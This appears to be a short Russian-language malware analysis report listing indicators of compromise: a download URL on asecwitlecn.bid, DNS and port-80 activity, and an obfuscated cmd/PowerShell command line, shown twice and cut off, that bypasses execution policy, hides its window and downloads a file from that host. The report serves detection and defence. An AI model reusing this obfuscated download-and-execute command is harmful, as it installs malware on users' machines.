Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^Er^sHE^l^l.^E^Xe^ -exEcU^T^ioNP^Oli^c^y ^By^pA^SS -N^oP^roF^ILe -^WiNdO^w^s^TYLE H^Id^D^En (N^e^w-^O^bJ^eCt SY^STeM^.NEt.we^bc^LIen^T)^.do^WN^l^OADf^iL^E^('http://asecwit...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "pow^Er^sHE^l^l.^E^Xe^ -exEcU^T^ioNP^Oli^c^y ^By^pA^SS -N^oP^roF^ILe -^WiNdO^w^s^TYLE H^Id^D^En (N^e^w-^O^bJ^eCt SY^STeM^.NEt.we^bc^LIen^T)^.do^WN^l^OADf^iL^E^('http://asecwit...' (со скрытым окном)